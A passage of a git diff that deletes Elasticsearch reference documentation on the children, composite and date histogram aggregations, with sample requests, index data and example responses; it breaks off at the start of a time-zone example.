I have Windows 2003 server and i bought a new Windows 2008 server...", - "title": "Whats the best way to file transfer my site from server to a newer one?", - "tags": [ - "windows-server-2003", - "windows-server-2008", - "file-transfer" - ] -} --------------------------------------------------- -// TEST[continued] - -Examples of `answer` documents: - -[source,console] --------------------------------------------------- -PUT child_example/_doc/2?routing=1 -{ - "join": { - "name": "answer", - "parent": "1" - }, - "owner": { - "location": "Norfolk, United Kingdom", - "display_name": "Sam", - "id": 48 - }, - "body": "

Unfortunately you're pretty much limited to FTP...", - "creation_date": "2009-05-04T13:45:37.030" -} - -PUT child_example/_doc/3?routing=1&refresh -{ - "join": { - "name": "answer", - "parent": "1" - }, - "owner": { - "location": "Norfolk, United Kingdom", - "display_name": "Troll", - "id": 49 - }, - "body": "

Use Linux...", - "creation_date": "2009-05-05T13:45:37.030" -} --------------------------------------------------- -// TEST[continued] - -The following request can be built that connects the two together: - -[source,console] --------------------------------------------------- -POST child_example/_search?size=0 -{ - "aggs": { - "top-tags": { - "terms": { - "field": "tags.keyword", - "size": 10 - }, - "aggs": { - "to-answers": { - "children": { - "type" : "answer" <1> - }, - "aggs": { - "top-names": { - "terms": { - "field": "owner.display_name.keyword", - "size": 10 - } - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The `type` points to type / mapping with the name `answer`. - -The above example returns the top question tags and per tag the top answer owners. - -Possible response: - -[source,console-result] --------------------------------------------------- -{ - "took": 25, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 3, - "relation": "eq" - }, - "max_score": null, - "hits": [] - }, - "aggregations": { - "top-tags": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "file-transfer", - "doc_count": 1, <1> - "to-answers": { - "doc_count": 2, <2> - "top-names": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "Sam", - "doc_count": 1 - }, - { - "key": "Troll", - "doc_count": 1 - } - ] - } - } - }, - { - "key": "windows-server-2003", - "doc_count": 1, <1> - "to-answers": { - "doc_count": 2, <2> - "top-names": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "Sam", - "doc_count": 1 - }, - { - "key": "Troll", - "doc_count": 1 - } - ] - } - } - }, - { - "key": "windows-server-2008", - "doc_count": 1, <1> - "to-answers": { - "doc_count": 2, <2> - "top-names": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "Sam", - "doc_count": 1 - }, - { - "key": "Troll", - "doc_count": 1 - } - ] - } - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 25/"took": $body.took/] - -<1> The number of question documents with the tag `file-transfer`, `windows-server-2003`, etc. -<2> The number of answer documents that are related to question documents with the tag `file-transfer`, `windows-server-2003`, etc. diff --git a/docs/reference/aggregations/bucket/composite-aggregation.asciidoc b/docs/reference/aggregations/bucket/composite-aggregation.asciidoc deleted file mode 100644 index 8870e63dd2c..00000000000 --- a/docs/reference/aggregations/bucket/composite-aggregation.asciidoc +++ /dev/null @@ -1,859 +0,0 @@ -[[search-aggregations-bucket-composite-aggregation]] -=== Composite aggregation -++++ -Composite -++++ - -A multi-bucket aggregation that creates composite buckets from different sources. - -Unlike the other `multi-bucket` aggregations, you can use the `composite` -aggregation to paginate **all** buckets from a multi-level aggregation -efficiently. This aggregation provides a way to stream **all** buckets of a -specific aggregation, similar to what -<> does for documents. - -The composite buckets are built from the combinations of the -values extracted/created for each document and each combination is considered as -a composite bucket. - -////////////////////////// - -[source,js] --------------------------------------------------- -PUT /sales -{ - "mappings": { - "properties": { - "product": { - "type": "keyword" - }, - "timestamp": { - "type": "date" - }, - "price": { - "type": "long" - }, - "shop": { - "type": "keyword" - }, - "location": { - "type": "geo_point" - }, - "nested": { - "type": "nested", - "properties": { - "product": { - "type": "keyword" - }, - "timestamp": { - "type": "date" - }, - "price": { - "type": "long" - }, - "shop": { - "type": "keyword" - } - } - } - } - } -} - -POST /sales/_bulk?refresh -{"index":{"_id":0}} -{"product": "mad max", "price": "20", "timestamp": "2017-05-09T14:35"} -{"index":{"_id":1}} -{"product": "mad max", "price": "25", "timestamp": "2017-05-09T12:35"} -{"index":{"_id":2}} -{"product": "rocky", "price": "10", "timestamp": "2017-05-08T09:10"} -{"index":{"_id":3}} -{"product": "mad max", "price": "27", "timestamp": "2017-05-10T07:07"} -{"index":{"_id":4}} -{"product": "apocalypse now", "price": "10", "timestamp": "2017-05-11T08:35"} -------------------------------------------------- -// NOTCONSOLE -// TESTSETUP - -////////////////////////// - -For example, consider the following document: - -[source,js] --------------------------------------------------- -{ - "keyword": ["foo", "bar"], - "number": [23, 65, 76] -} --------------------------------------------------- -// NOTCONSOLE - -Using `keyword` and `number` as source fields for the aggregation results in -the following composite buckets: - -[source,js] --------------------------------------------------- -{ "keyword": "foo", "number": 23 } -{ "keyword": "foo", "number": 65 } -{ "keyword": "foo", "number": 76 } -{ "keyword": "bar", "number": 23 } -{ "keyword": "bar", "number": 65 } -{ "keyword": "bar", "number": 76 } --------------------------------------------------- -// NOTCONSOLE - -==== Value sources - -The `sources` parameter defines the source fields to use when building -composite buckets. The order that the `sources` are defined controls the order -that the keys are returned. - -NOTE: You must use a unique name when defining `sources`. - -The `sources` parameter can be any of the following types: - -* <<_terms,Terms>> -* <<_histogram,Histogram>> -* <<_date_histogram,Date histogram>> -* <<_geotile_grid,GeoTile grid>> - -[[_terms]] -===== Terms - -The `terms` value source is equivalent to a simple `terms` aggregation. -The values are extracted from a field or a script exactly like the `terms` aggregation. - -Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "product": { "terms": { "field": "product" } } } - ] - } - } - } -} --------------------------------------------------- - -Like the `terms` aggregation it is also possible to use a script to create the values for the composite buckets: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { - "product": { - "terms": { - "script": { - "source": "doc['product'].value", - "lang": "painless" - } - } - } - } - ] - } - } - } -} --------------------------------------------------- - -[[_histogram]] -===== Histogram - -The `histogram` value source can be applied on numeric values to build fixed size -interval over the values. The `interval` parameter defines how the numeric values should be -transformed. For instance an `interval` set to 5 will translate any numeric values to its closest interval, -a value of `101` would be translated to `100` which is the key for the interval between 100 and 105. - -Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "histo": { "histogram": { "field": "price", "interval": 5 } } } - ] - } - } - } -} --------------------------------------------------- - -The values are built from a numeric field or a script that return numerical values: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { - "histo": { - "histogram": { - "interval": 5, - "script": { - "source": "doc['price'].value", - "lang": "painless" - } - } - } - } - ] - } - } - } -} --------------------------------------------------- - -[[_date_histogram]] -===== Date histogram - -The `date_histogram` is similar to the `histogram` value source except that the interval -is specified by date/time expression: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d" } } } - ] - } - } - } -} --------------------------------------------------- - -The example above creates an interval per day and translates all `timestamp` values to the start of its closest intervals. -Available expressions for interval: `year`, `quarter`, `month`, `week`, `day`, `hour`, `minute`, `second` - -Time values can also be specified via abbreviations supported by <> parsing. -Note that fractional time values are not supported, but you can address this by shifting to another -time unit (e.g., `1.5h` could instead be specified as `90m`). - -*Format* - -Internally, a date is represented as a 64 bit number representing a timestamp in milliseconds-since-the-epoch. -These timestamps are returned as the bucket keys. It is possible to return a formatted date string instead using -the format specified with the format parameter: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { - "date": { - "date_histogram": { - "field": "timestamp", - "calendar_interval": "1d", - "format": "yyyy-MM-dd" <1> - } - } - } - ] - } - } - } -} --------------------------------------------------- - -<1> Supports expressive date <> - -*Time Zone* - -Date-times are stored in Elasticsearch in UTC. By default, all bucketing and -rounding is also done in UTC. The `time_zone` parameter can be used to indicate -that bucketing should use a different time zone. - -Time zones may either be specified as an ISO 8601 UTC offset (e.g. `+01:00` or -`-08:00`) or as a timezone id, an identifier used in the TZ database like -`America/Los_Angeles`. - -*Offset* - -include::datehistogram-aggregation.asciidoc[tag=offset-explanation] - -[source,console,id=composite-aggregation-datehistogram-offset-example] ----- -PUT my-index-000001/_doc/1?refresh -{ - "date": "2015-10-01T05:30:00Z" -} - -PUT my-index-000001/_doc/2?refresh -{ - "date": "2015-10-01T06:30:00Z" -} - -GET my-index-000001/_search?size=0 -{ - "aggs": { - "my_buckets": { - "composite" : { - "sources" : [ - { - "date": { - "date_histogram" : { - "field": "date", - "calendar_interval": "day", - "offset": "+6h", - "format": "iso8601" - } - } - } - ] - } - } - } -} ----- - -include::datehistogram-aggregation.asciidoc[tag=offset-result-intro] - -[source,console-result] ----- -{ - ... - "aggregations": { - "my_buckets": { - "after_key": { "date": "2015-10-01T06:00:00.000Z" }, - "buckets": [ - { - "key": { "date": "2015-09-30T06:00:00.000Z" }, - "doc_count": 1 - }, - { - "key": { "date": "2015-10-01T06:00:00.000Z" }, - "doc_count": 1 - } - ] - } - } -} ----- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -include::datehistogram-aggregation.asciidoc[tag=offset-note] - -[[_geotile_grid]] -===== GeoTile grid - -The `geotile_grid` value source works on `geo_point` fields and groups points into buckets that represent -cells in a grid. The resulting grid can be sparse and only contains cells -that have matching data. Each cell corresponds to a -{wikipedia}/Tiled_web_map[map tile] as used by many online map -sites. Each cell is labeled using a "{zoom}/{x}/{y}" format, where zoom is equal -to the user-specified precision. - -[source,console,id=composite-aggregation-geotilegrid-example] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "tile": { "geotile_grid": { "field": "location", "precision": 8 } } } - ] - } - } - } -} --------------------------------------------------- - -*Precision* - -The highest-precision geotile of length 29 produces cells that cover -less than 10cm by 10cm of land. This precision is uniquely suited for composite aggregations as each -tile does not have to be generated and loaded in memory. - -See https://wiki.openstreetmap.org/wiki/Zoom_levels[Zoom level documentation] -on how precision (zoom) correlates to size on the ground. Precision for this -aggregation can be between 0 and 29, inclusive. - -*Bounding box filtering* - -The geotile source can optionally be constrained to a specific geo bounding box, which reduces -the range of tiles used. These bounds are useful when only a specific part of a geographical area needs high -precision tiling. - -[source,console,id=composite-aggregation-geotilegrid-boundingbox-example] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { - "tile": { - "geotile_grid": { - "field": "location", - "precision": 22, - "bounds": { - "top_left": "52.4, 4.9", - "bottom_right": "52.3, 5.0" - } - } - } - } - ] - } - } - } -} --------------------------------------------------- - -===== Mixing different value sources - -The `sources` parameter accepts an array of value sources. -It is possible to mix different value sources to create composite buckets. -For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d" } } }, - { "product": { "terms": { "field": "product" } } } - ] - } - } - } -} --------------------------------------------------- - -This will create composite buckets from the values created by two value sources, a `date_histogram` and a `terms`. -Each bucket is composed of two values, one for each value source defined in the aggregation. -Any type of combinations is allowed and the order in the array is preserved -in the composite buckets. - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "shop": { "terms": { "field": "shop" } } }, - { "product": { "terms": { "field": "product" } } }, - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d" } } } - ] - } - } - } -} --------------------------------------------------- - -==== Order - -By default the composite buckets are sorted by their natural ordering. Values are sorted -in ascending order of their values. When multiple value sources are requested, the ordering is done per value -source, the first value of the composite bucket is compared to the first value of the other composite bucket and if they are equals the -next values in the composite bucket are used for tie-breaking. This means that the composite bucket - `[foo, 100]` is considered smaller than `[foobar, 0]` because `foo` is considered smaller than `foobar`. -It is possible to define the direction of the sort for each value source by setting `order` to `asc` (default value) -or `desc` (descending order) directly in the value source definition. -For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d", "order": "desc" } } }, - { "product": { "terms": { "field": "product", "order": "asc" } } } - ] - } - } - } -} --------------------------------------------------- - -\... will sort the composite bucket in descending order when comparing values from the `date_histogram` source -and in ascending order when comparing values from the `terms` source. - -==== Missing bucket - -By default documents without a value for a given source are ignored. -It is possible to include them in the response by setting `missing_bucket` to -`true` (defaults to `false`): - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "product_name": { "terms": { "field": "product", "missing_bucket": true } } } - ] - } - } - } -} --------------------------------------------------- - -In the example above the source `product_name` will emit an explicit `null` value -for documents without a value for the field `product`. -The `order` specified in the source dictates whether the `null` values should rank -first (ascending order, `asc`) or last (descending order, `desc`). - -==== Size - -The `size` parameter can be set to define how many composite buckets should be returned. -Each composite bucket is considered as a single bucket, so setting a size of 10 will return the -first 10 composite buckets created from the value sources. -The response contains the values for each composite bucket in an array containing the values extracted -from each value source. Defaults to `10`. - -==== Pagination - -If the number of composite buckets is too high (or unknown) to be returned in a single response -it is possible to split the retrieval in multiple requests. -Since the composite buckets are flat by nature, the requested `size` is exactly the number of composite buckets -that will be returned in the response (assuming that they are at least `size` composite buckets to return). -If all composite buckets should be retrieved it is preferable to use a small size (`100` or `1000` for instance) -and then use the `after` parameter to retrieve the next results. -For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "size": 2, - "sources": [ - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d" } } }, - { "product": { "terms": { "field": "product" } } } - ] - } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -\... returns: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "my_buckets": { - "after_key": { - "date": 1494288000000, - "product": "mad max" - }, - "buckets": [ - { - "key": { - "date": 1494201600000, - "product": "rocky" - }, - "doc_count": 1 - }, - { - "key": { - "date": 1494288000000, - "product": "mad max" - }, - "doc_count": 2 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -To get the next set of buckets, resend the same aggregation with the `after` -parameter set to the `after_key` value returned in the response. -For example, this request uses the `after_key` value provided in the previous response: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "size": 2, - "sources": [ - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d", "order": "desc" } } }, - { "product": { "terms": { "field": "product", "order": "asc" } } } - ], - "after": { "date": 1494288000000, "product": "mad max" } <1> - } - } - } -} --------------------------------------------------- - -<1> Should restrict the aggregation to buckets that sort **after** the provided values. - -NOTE: The `after_key` is *usually* the key to the last bucket returned in -the response, but that isn't guaranteed. Always use the returned `after_key` instead -of derriving it from the buckets. - -==== Early termination - -For optimal performance the <> should be set on the index so that it matches -parts or fully the source order in the composite aggregation. -For instance the following index sort: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "index": { - "sort.field": [ "username", "timestamp" ], <1> - "sort.order": [ "asc", "desc" ] <2> - } - }, - "mappings": { - "properties": { - "username": { - "type": "keyword", - "doc_values": true - }, - "timestamp": { - "type": "date" - } - } - } -} --------------------------------------------------- - -<1> This index is sorted by `username` first then by `timestamp`. -<2> ... in ascending order for the `username` field and in descending order for the `timestamp` field. - -.. could be used to optimize these composite aggregations: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "user_name": { "terms": { "field": "user_name" } } } <1> - ] - } - } - } -} --------------------------------------------------- - -<1> `user_name` is a prefix of the index sort and the order matches (`asc`). - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "user_name": { "terms": { "field": "user_name" } } }, <1> - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d", "order": "desc" } } } <2> - ] - } - } - } -} --------------------------------------------------- - -<1> `user_name` is a prefix of the index sort and the order matches (`asc`). -<2> `timestamp` matches also the prefix and the order matches (`desc`). - -In order to optimize the early termination it is advised to set `track_total_hits` in the request -to `false`. The number of total hits that match the request can be retrieved on the first request -and it would be costly to compute this number on every page: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "track_total_hits": false, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "user_name": { "terms": { "field": "user_name" } } }, - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d", "order": "desc" } } } - ] - } - } - } -} --------------------------------------------------- - -Note that the order of the source is important, in the example below switching the `user_name` with the `timestamp` -would deactivate the sort optimization since this configuration wouldn't match the index sort specification. -If the order of sources do not matter for your use case you can follow these simple guidelines: - - * Put the fields with the highest cardinality first. - * Make sure that the order of the field matches the order of the index sort. - * Put multi-valued fields last since they cannot be used for early termination. - -WARNING: <> can slowdown indexing, it is very important to test index sorting -with your specific use case and dataset to ensure that it matches your requirement. If it doesn't note that `composite` -aggregations will also try to early terminate on non-sorted indices if the query matches all document (`match_all` query). - -==== Sub-aggregations - -Like any `multi-bucket` aggregations the `composite` aggregation can hold sub-aggregations. -These sub-aggregations can be used to compute other buckets or statistics on each composite bucket created by this -parent aggregation. -For instance the following example computes the average value of a field -per composite bucket: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d", "order": "desc" } } }, - { "product": { "terms": { "field": "product" } } } - ] - }, - "aggregations": { - "the_avg": { - "avg": { "field": "price" } - } - } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -\... returns: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "my_buckets": { - "after_key": { - "date": 1494201600000, - "product": "rocky" - }, - "buckets": [ - { - "key": { - "date": 1494460800000, - "product": "apocalypse now" - }, - "doc_count": 1, - "the_avg": { - "value": 10.0 - } - }, - { - "key": { - "date": 1494374400000, - "product": "mad max" - }, - "doc_count": 1, - "the_avg": { - "value": 27.0 - } - }, - { - "key": { - "date": 1494288000000, - "product": "mad max" - }, - "doc_count": 2, - "the_avg": { - "value": 22.5 - } - }, - { - "key": { - "date": 1494201600000, - "product": "rocky" - }, - "doc_count": 1, - "the_avg": { - "value": 10.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -==== Pipeline aggregations - -The composite agg is not currently compatible with pipeline aggregations, nor does it make sense in most cases. -E.g. due to the paging nature of composite aggs, a single logical partition (one day for example) might be spread -over multiple pages. Since pipeline aggregations are purely post-processing on the final list of buckets, -running something like a derivative on a composite page could lead to inaccurate results as it is only taking into -account a "partial" result on that page. - -Pipeline aggs that are self contained to a single bucket (such as `bucket_selector`) might be supported in the future. diff --git a/docs/reference/aggregations/bucket/datehistogram-aggregation.asciidoc b/docs/reference/aggregations/bucket/datehistogram-aggregation.asciidoc deleted file mode 100644 index 707f5251cb2..00000000000 --- a/docs/reference/aggregations/bucket/datehistogram-aggregation.asciidoc +++ /dev/null @@ -1,724 +0,0 @@ -[[search-aggregations-bucket-datehistogram-aggregation]] -=== Date histogram aggregation -++++ -Date histogram -++++ - -This multi-bucket aggregation is similar to the normal -<>, but it can -only be used with date or date range values. Because dates are represented internally in -Elasticsearch as long values, it is possible, but not as accurate, to use the -normal `histogram` on dates as well. The main difference in the two APIs is -that here the interval can be specified using date/time expressions. Time-based -data requires special support because time-based intervals are not always a -fixed length. - -Like the histogram, values are rounded *down* into the closest bucket. For -example, if the interval is a calendar day, `2020-01-03T07:00:01Z` is rounded to -`2020-01-03T00:00:00Z`. Values are rounded as follows: - -[source,java] ----- -bucket_key = Math.floor(value / interval) * interval ----- - -[[calendar_and_fixed_intervals]] -==== Calendar and fixed intervals - -When configuring a date histogram aggregation, the interval can be specified -in two manners: calendar-aware time intervals, and fixed time intervals. - -Calendar-aware intervals understand that daylight savings changes the length -of specific days, months have different amounts of days, and leap seconds can -be tacked onto a particular year. - -Fixed intervals are, by contrast, always multiples of SI units and do not change -based on calendaring context. - -[NOTE] -.Combined `interval` field is deprecated -================================== -deprecated[7.2, `interval` field is deprecated] Historically both calendar and fixed -intervals were configured in a single `interval` field, which led to confusing -semantics. Specifying `1d` would be assumed as a calendar-aware time, -whereas `2d` would be interpreted as fixed time. To get "one day" of fixed time, -the user would need to specify the next smaller unit (in this case, `24h`). - -This combined behavior was often unknown to users, and even when knowledgeable about -the behavior it was difficult to use and confusing. - -This behavior has been deprecated in favor of two new, explicit fields: `calendar_interval` -and `fixed_interval`. - -By forcing a choice between calendar and intervals up front, the semantics of the interval -are clear to the user immediately and there is no ambiguity. The old `interval` field -will be removed in the future. -================================== - -[[calendar_intervals]] -==== Calendar intervals - -Calendar-aware intervals are configured with the `calendar_interval` parameter. -You can specify calendar intervals using the unit name, such as `month`, or as a -single unit quantity, such as `1M`. For example, `day` and `1d` are equivalent. -Multiple quantities, such as `2d`, are not supported. - -The accepted calendar intervals are: - -`minute`, `1m` :: - -All minutes begin at 00 seconds. -One minute is the interval between 00 seconds of the first minute and 00 -seconds of the following minute in the specified time zone, compensating for any -intervening leap seconds, so that the number of minutes and seconds past the -hour is the same at the start and end. - -`hour`, `1h` :: - -All hours begin at 00 minutes and 00 seconds. -One hour (1h) is the interval between 00:00 minutes of the first hour and 00:00 -minutes of the following hour in the specified time zone, compensating for any -intervening leap seconds, so that the number of minutes and seconds past the hour -is the same at the start and end. - -`day`, `1d` :: - -All days begin at the earliest possible time, which is usually 00:00:00 -(midnight). -One day (1d) is the interval between the start of the day and the start of -of the following day in the specified time zone, compensating for any intervening -time changes. - -`week`, `1w` :: - -One week is the interval between the start day_of_week:hour:minute:second -and the same day of the week and time of the following week in the specified -time zone. - -`month`, `1M` :: - -One month is the interval between the start day of the month and time of -day and the same day of the month and time of the following month in the specified -time zone, so that the day of the month and time of day are the same at the start -and end. - -`quarter`, `1q` :: - -One quarter is the interval between the start day of the month and -time of day and the same day of the month and time of day three months later, -so that the day of the month and time of day are the same at the start and end. + - -`year`, `1y` :: - -One year is the interval between the start day of the month and time of -day and the same day of the month and time of day the following year in the -specified time zone, so that the date and time are the same at the start and end. + - -[[calendar_interval_examples]] -===== Calendar interval examples -As an example, here is an aggregation requesting bucket intervals of a month in calendar time: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -If you attempt to use multiples of calendar units, the aggregation will fail because only -singular calendar units are supported: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "date_histogram": { - "field": "date", - "calendar_interval": "2d" - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[catch:bad_request] - -[source,js] --------------------------------------------------- -{ - "error" : { - "root_cause" : [...], - "type" : "x_content_parse_exception", - "reason" : "[1:82] [date_histogram] failed to parse field [calendar_interval]", - "caused_by" : { - "type" : "illegal_argument_exception", - "reason" : "The supplied interval [2d] could not be parsed as a calendar interval.", - "stack_trace" : "java.lang.IllegalArgumentException: The supplied interval [2d] could not be parsed as a calendar interval." - } - } -} - --------------------------------------------------- -// NOTCONSOLE - -[[fixed_intervals]] -==== Fixed intervals - -Fixed intervals are configured with the `fixed_interval` parameter. - -In contrast to calendar-aware intervals, fixed intervals are a fixed number of SI -units and never deviate, regardless of where they fall on the calendar. One second -is always composed of `1000ms`. This allows fixed intervals to be specified in -any multiple of the supported units. - -However, it means fixed intervals cannot express other units such as months, -since the duration of a month is not a fixed quantity. Attempting to specify -a calendar interval like month or quarter will throw an exception. - -The accepted units for fixed intervals are: - -milliseconds (`ms`) :: -A single millisecond. This is a very, very small interval. - -seconds (`s`) :: -Defined as 1000 milliseconds each. - -minutes (`m`) :: -Defined as 60 seconds each (60,000 milliseconds). -All minutes begin at 00 seconds. - -hours (`h`) :: -Defined as 60 minutes each (3,600,000 milliseconds). -All hours begin at 00 minutes and 00 seconds. - -days (`d`) :: -Defined as 24 hours (86,400,000 milliseconds). -All days begin at the earliest possible time, which is usually 00:00:00 -(midnight). - -[[fixed_interval_examples]] -===== Fixed interval examples - -If we try to recreate the "month" `calendar_interval` from earlier, we can approximate that with -30 fixed days: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "date_histogram": { - "field": "date", - "fixed_interval": "30d" - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -But if we try to use a calendar unit that is not supported, such as weeks, we'll get an exception: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "date_histogram": { - "field": "date", - "fixed_interval": "2w" - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[catch:bad_request] - -[source,js] --------------------------------------------------- -{ - "error" : { - "root_cause" : [...], - "type" : "x_content_parse_exception", - "reason" : "[1:82] [date_histogram] failed to parse field [fixed_interval]", - "caused_by" : { - "type" : "illegal_argument_exception", - "reason" : "failed to parse setting [date_histogram.fixedInterval] with value [2w] as a time value: unit is missing or unrecognized", - "stack_trace" : "java.lang.IllegalArgumentException: failed to parse setting [date_histogram.fixedInterval] with value [2w] as a time value: unit is missing or unrecognized" - } - } -} - --------------------------------------------------- -// NOTCONSOLE - -[[datehistogram-aggregation-notes]] -==== Date histogram usage notes - -In all cases, when the specified end time does not exist, the actual end time is -the closest available time after the specified end. - -Widely distributed applications must also consider vagaries such as countries that -start and stop daylight savings time at 12:01 A.M., so end up with one minute of -Sunday followed by an additional 59 minutes of Saturday once a year, and countries -that decide to move across the international date line. Situations like -that can make irregular time zone offsets seem easy. - -As always, rigorous testing, especially around time-change events, will ensure -that your time interval specification is -what you intend it to be. - -WARNING: To avoid unexpected results, all connected servers and clients must -sync to a reliable network time service. - -NOTE: Fractional time values are not supported, but you can address this by -shifting to another time unit (e.g., `1.5h` could instead be specified as `90m`). - -NOTE: You can also specify time values using abbreviations supported by -<> parsing. - -[[datehistogram-aggregation-keys]] -==== Keys - -Internally, a date is represented as a 64 bit number representing a timestamp -in milliseconds-since-the-epoch (01/01/1970 midnight UTC). These timestamps are -returned as the ++key++ name of the bucket. The `key_as_string` is the same -timestamp converted to a formatted -date string using the `format` parameter specification: - -TIP: If you don't specify `format`, the first date -<> specified in the field mapping is used. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M", - "format": "yyyy-MM-dd" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Supports expressive date <> - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "sales_over_time": { - "buckets": [ - { - "key_as_string": "2015-01-01", - "key": 1420070400000, - "doc_count": 3 - }, - { - "key_as_string": "2015-02-01", - "key": 1422748800000, - "doc_count": 2 - }, - { - "key_as_string": "2015-03-01", - "key": 1425168000000, - "doc_count": 2 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -[[datehistogram-aggregation-time-zone]] -==== Time zone - -{es} stores date-times in Coordinated Universal Time (UTC). By default, all bucketing and -rounding is also done in UTC. Use the `time_zone` parameter to indicate -that bucketing should use a different time zone. - -For example, if the interval is a calendar day and the time zone is -`America/New_York` then `2020-01-03T01:00:01Z` is : -# Converted to `2020-01-02T18:00:01` -# Rounded down to `2020-01-02T00:00:00` -# Then converted back to UTC to produce `2020-01-02T05:00:00:00Z` -# Finally, when the bucket is turned into a string key it is printed in - `America/New_York` so it'll display as `"2020-01-02T00:00:00"`. - -It looks like: - -[source,java] ----- -bucket_key = localToUtc(Math.floor(utcToLocal(value) / interval) * interval)) ----- - -You can specify time zones as an ISO 8601 UTC offset (e.g. `+01:00` or -`-08:00`) or as an IANA time zone ID, -such as `America/Los_Angeles`. - -Consider the following example: - -[source,console] ---------------------------------- -PUT my-index-000001/_doc/1?refresh -{ - "date": "2015-10-01T00:30:00Z" -} - -PUT my-index-000001/_doc/2?refresh -{ - "date": "2015-10-01T01:30:00Z" -} - -GET my-index-000001/_search?size=0 -{ - "aggs": { - "by_day": { - "date_histogram": { - "field": "date", - "calendar_interval": "day" - } - } - } -} ---------------------------------- - -If you don't specify a time zone, UTC is used. This would result in both of these -documents being placed into the same day bucket, which starts at midnight UTC -on 1 October 2015: - -[source,console-result] ---------------------------------- -{ - ... - "aggregations": { - "by_day": { - "buckets": [ - { - "key_as_string": "2015-10-01T00:00:00.000Z", - "key": 1443657600000, - "doc_count": 2 - } - ] - } - } -} ---------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -If you specify a `time_zone` of `-01:00`, midnight in that time zone is one hour -before midnight UTC: - -[source,console] 